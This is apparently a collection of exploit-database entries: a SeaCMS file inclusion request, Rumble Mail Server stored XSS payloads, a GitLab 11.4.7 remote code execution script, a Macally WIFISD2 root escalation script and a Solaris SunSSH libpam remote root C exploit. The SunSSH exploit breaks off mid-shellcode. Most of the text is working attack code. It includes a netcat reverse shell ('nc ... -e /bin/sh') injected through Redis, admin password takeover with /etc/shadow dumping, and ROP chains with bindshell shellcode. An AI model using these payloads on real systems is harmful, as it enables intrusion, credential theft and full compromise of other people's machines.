# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 Vulnerable parameters： file payload：C:/windows/system.ini

# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /users HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/users Upgrade-Insecure-Requests: 1 username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on a.com<br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h1>RumbleLua users </h1> <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br /> Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br /> while regular users can only see and edit the domains they have access to. </p> <table class="elements"> <tr> <th>Create a new user:</th> </tr> <tr> <td> <form action="/users" method="post" name="makeuser"> <div style="width: 300px; text-align:right; float: left;"> <label for="username"><strong>Username:</strong></label> <input name="username" autocomplete="off" type="text" id="username" > <br> <label for="password"><strong>Password:</strong></label> <input type="password" autocomplete="off" name="password" id="password"> <br /> <label for="password"><strong>Access rights:</strong></label> <select name="rights" size="4" style="width: 150px;" multiple="multiple"> <option value="*" style="color:#C33; font-weight:bold;">Full control</option> <optgroup label="Domains:"> </optgroup> </select> </div> <p><br /><br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> &nbsp;&nbsp; <input type="submit" name="submit" id="submit" value="Submit" /> </p> </form> </td> </tr> </table> <table width="200" class="elements"> <tr> <th>Username</th> <th>Rights</th> <th>Actions</th> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp; <a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td> <td>Full control</td> <td> <a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp; <a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp; <a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> </table> <p>&nbsp;</p> </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>

# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /settings:save HTTP/1.1 Host: 127.0.0.1:2580 Connection: keep-alive Content-Length: 343 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:2580 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1:2580/settings Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings HTTP/1.1 302 Moved Location: /settings:save HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on <script>alert(xss.com)</script><br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h1>Server settings</h1> Saving config/rumble.conf </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>

# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Info The parameters `domain` and `path` are vulnerable to stored XSS. # Exploit: POST /domains HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 119 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( Upgrade-Insecure-Requests: 1 domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on a<br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h2>Domains</h2> <p> <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td> <form action="/domains" method="post" id='create'> <div> <div > <div class='form_key'> Domain name: </div> <div class='form_value'> <input type="text" name="domain"/> </div> </div> <div> <div class='form_key'> Optional alt. storage path: </div> <div class='form_value'> <input type="text" name="path"/> </div> </div> <div class='form_el' id='domainsave' > <div class='form_key'> <input type="hidden" name="create" value="true"/> <input class="button" type="submit" value="Save domain"/> <input class="button" type="reset" value="Reset"/> </div> </div> <br/><br/><br/><br/><br /> </div> </form> </td></tr></table></p> <p>&nbsp;</p> <table class="elements" border='0' cellpadding='5' cellspacing='1'> <tr><th>Domain</th><th>Actions</th></tr> <tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table> </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>

# Exploit Title: Gitlab 11.4.7 - Remote Code Execution # Date: 14-12-2020 # Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox # Vendor Homepage: https://about.gitlab.com/ # POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ # Tested On: Debian 10 + Apache/2.4.46 (Debian) # Version: 11.4.7 community import sys import requests import time import random import http.cookiejar import os.path from os import path # Sign in GitLab 11.4.7 portal and get (using Burp or something other): # authenticity_token # authenticated cookies # username # specify localport and localip for reverse shell username='aaaaaaaaaaaa' authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g==' cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false' localport='1234' localip='192.168.0.114' url = "http://192.168.0.130:5080" proxies = { "http": "http://localhost:8080" } def deb(str): print("Debug => "+str) def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username): return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'} import string def random_string(length): return ''.join(random.choice(string.ascii_letters) for m in range(length)) def init(username,cookie,authenticity_token,localport,localip): from bs4 import BeautifulSoup import re import urllib.parse deb("Token: "+authenticity_token) deb("Cookie: "+cookie) session=requests.Session() headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'} r=session.get(url+'/projects/new',headers=headers,allow_redirects=True) soup = BeautifulSoup(r.content,"lxml") nsid = soup.findAll('input', {"id": "project_namespace_id"}) namespace_id=nsid[0]['value']; deb("Namespace ID: "+namespace_id) prgname=random_string(8) newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username) newpayload=urllib.parse.urlencode(newpayload) deb("Payload encoded: "+newpayload) r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False) os.system("nc -nvlp "+localport) init(username,cookie,authenticity_token,localport,localip)

# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation # Date: 03.12.2020 # Exploit Author: Maximilian Barz and Daniel Schwendner # Vendor Homepage: https://us.macally.com/products/wifisd2 # Version: 2.000.010 # Tested on: Kali Linux 5.7.0-kali1-amd64 # CVE : CVE-2020-29669 # Reference: https://github.com/S1lkys/CVE-2020-29669/ #!/usr/bin/env/python3 import requests import telnetlib import os import sys import re banner = '''\033[94m ██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓ ▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒ ░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░ ▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \x1b[0m Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner ''' def main(): if(len(sys.argv) < 2): print(banner) print("Usage: %s <host> " % sys.argv[0]) print("Eg: %s 1.2.3.4 " % sys.argv[0]) return rhost = sys.argv[1] session = requests.Session() guest_creds = "guest_pass" admin_pass_to_set = "Silky123" def send_requests(): url = "http://"+rhost+"/protocol.csp?function=set" payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'} headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://'+rhost+'/index.html', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '65', 'Connection': 'close', 'Cache-Control': 'no-cache', } r= session.post(url, payload, headers) if (b"<errno>0</errno>" in r.content): print("\033[92m[+] Authentication successful\x1b[0m") print("\t"+str(session.cookies.get_dict())) else: print("\033[91m[+] Authentication failed.\x1b[0m") sys.exit() url = "http://"+rhost+"/protocol.csp?fname=security&function=set" payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set} headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://'+rhost+'/app/user/guest.html', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '49', 'Connection': 'close', 'Cache-Control': 'no-cache', } d = session.post(url, payload, headers) if (b"<errno>0</errno>" in d.content): print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m") telnet_grep_root_hash() #print("[+] Spawning Admin Shell") #telnet_login() else: print("\033[91m[+] Admin Password change failed\x1b[0m") sys.exit() def telnet_grep_root_hash(): user = "admin" tn = telnetlib.Telnet(rhost) tn.read_until(b"login: ") tn.write(user.encode('ascii') + b"\n") tn.read_until(b"Password: ") tn.write(admin_pass_to_set.encode('ascii') + b"\n") print("\033[92m[+] Dumping Hashes:\x1b[0m") tn.write(b"cat /etc/shadow\n\r") tn.write(b"exit\n") output = tn.read_all().decode('ascii') L = output.split('\n') for hash in L: if ":" in hash: print("\t"+hash) print("\n\r") for hash in L: if "root" in hash: print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m") print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7::: f = open("root_hash","w+") f.write(hash) f.close() crack_root_hash(); def crack_root_hash(): f = open("root_hash", "r") hash = f.read() if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash): print("\033[92mRoot Password: 20080826\x1b[0m\n") telnet_login() else: os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt def telnet_login(): print("\033[92m[+] Spawning Rootshell\x1b[0m") user = "root" root_password="20080826" tn = telnetlib.Telnet(rhost) tn.read_until(b"login: ") tn.write(user.encode('ascii') + b"\n") tn.read_until(b"Password: ") tn.write(root_password.encode('ascii') + b"\n") tn.interact() print(banner) send_requests() if(__name__ == '__main__'): main()

# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root # Exploit Author: Hacker Fantastic # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html # Version: 11 # Tested on: SunOS solaris 5.11 11.0 /* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * ==================================================================== * Makefile * all: hfsunsshdx * * hfsunsshdx: main.c * gcc main.c -o hfsunsshdx -lssh2 * * clean: * rm -rf hfsunsshdx * rm -rf core.* * * A trivial to reach stack-based buffer overflow is present in libpam on * Solaris. The vulnerable code exists in pam_framework.c parse_user_name() * which allocates a fixed size buffer of 512 bytes on the stack and parses * usernames into the buffer via modules (authtok_get) without bounds checks. * This issue can be reached remotely pre-authentication via SunSSH when * "keyboard-interactive" is enabled to use PAM based authentication. The * vulnerability was discovered being actively exploited by FireEye in the * wild and is part of an APT toolkit called "EVILSUN". The vulnerability * is present in both SPARC/x86 versions of Solaris & others (eg. illumos). * This exploit uses ROP gadgets to disable nxstack through mprotect on x86 * and a helper shellcode stub. The configuration in a default Solaris * install is vulnerable. The exploit makes use of libssh2 and tested on * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable * SunSSH implementation and versions later than 11.1 have updated SunSSH * code that prevents the issue being triggered. * * e.g. * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2 * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86' * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e * [+] entering keyboard-interactive authentication. * [-] number of prompts: 1 * [-] prompt 0 from server: 'Please enter user name: ' * [-] shellcode length 193 bytes * [-] rop chain length 68 * [-] exploit buffer length 580 * [-] sending exploit magic buffer... wait * [+] exploit success, handling payload... * [-] connected.. enjoy :) * SunOS solaris 5.11 11.0 i86pc i386 i86pc * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01 * helpdesk console Nov 27 17:57 * uid=0(root) gid=0(root) * * -- Hacker Fantastic (https://hacker.house) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <ctype.h> #include <getopt.h> #include <time.h> #include <signal.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/select.h> #include <arpa/inet.h> #include <sys/time.h> #include <libssh2.h> int sd = -1; int oldsd = -1; int ishell = -1; char* buf; char* payload; char* retaddr; struct sockaddr_in sain; struct target { char* name; char* ropchain; }; struct shellcode { char* name; char* shellcode; }; void spawn_shell(int); void bindshell_setup(short); void on_alarm(int); void on_interupt(int); void prepare_payload(); const int targetno = 5; struct target targets[] = { {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86", "\x41\x42\x43\x44" // %ebx "\x45\x46\x47\x48" // %esi "\x50\x51\x52\x53" // %ebp "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7) "\x01\x01\x04\x08" // %edx unused, must be writeable addr "\x41\x42\x43\x44" // %ebp unused var "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg "\x1a\xe7\x0b\xfe" // dec %edx ; ret "\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to shellcode "\xe0\xe8\x3e\xfe" // mov $0x72,%al "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x22\x9d\xd3\xfe"},// sysenter {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86", "\x41\x42\x43\x44" // %ebx overwrite unused "\x41\x42\x43\x44" // %esi overwrite unused "\xf8\x32\x04\x08" // %ebp overwrite unused "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7) "\x01\x30\x04\x08" // ptr for %edx "\x44\x43\x42\x41" // ptr for %ebp unused "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret "\xeb\x30\x04\x08" // shellcode ptr for %edx "\x1c\x33\x04\x08" // %ebp & used by "leave" "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret "\x41\x42\x43\x44" // %esi unused "\xe0\x30\x04\x08" // shellcode ptr to %ebx "\xe8\x32\x04\x08" // ptr into %ebp "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret "\xfe\xf8\xcf\xfe"},// sysenter {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x29\x28\x07\x08" // pop %ebx ; ret "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\x01\x30\x04\x08" // %edx pointer to page "\xb8\x31\x04\x08" // unused %ebp value "\xaa\x4c\x68\xfe" // pop %ecx ; ret "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) "\x61\x22\x07\x08" // dec %edx ; ret "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\xc3\x31\x04\x08" // shellcode addr for %edx "\xc3\x31\x04\x08" // unused %ebp value "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx) {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\xb1\x26\x07\x08" // pop %ebx ; ret "\xff\x01\xac\xfe" // write garbage here, unused gadget "\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret "\xff\x2f\x04\x08" // %edx pointer to page "\xc3\x31\x04\x08" // unused %ebp value "\x57\xaa\xe4\xfe" // pop %ecx ; ret "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7) "\xee\x6a\x65\xfe" // inc %edx ; ret "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\x86\xae\xe5\xfe" // pop %edx ; ret "\xc3\x31\x04\x08" // shellcode return address for %edx "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx) {"Solaris all Sun_SSH_1.x.x debug crash target", "\x41\x42\x43\x43" // %ebp ptr "\x78\x79\x80\x81"} // %eip ptr }; const int shellno = 4; struct shellcode shellcodes[] = { {"Solaris x86 bindshell tcp port 9999", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07); ================================================================== xorl %eax, %eax xorl %ecx, %ecx movl $0x08041001, %ebx movw $0x7001, %ax movb $0x7,%cl dec %ebx dec %eax pushl %ecx pushl %eax pushl %ebx pushl %ebx movl %esp, %ecx xorl %eax, %eax movb $0x74, %al int $0x91 */ /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e" 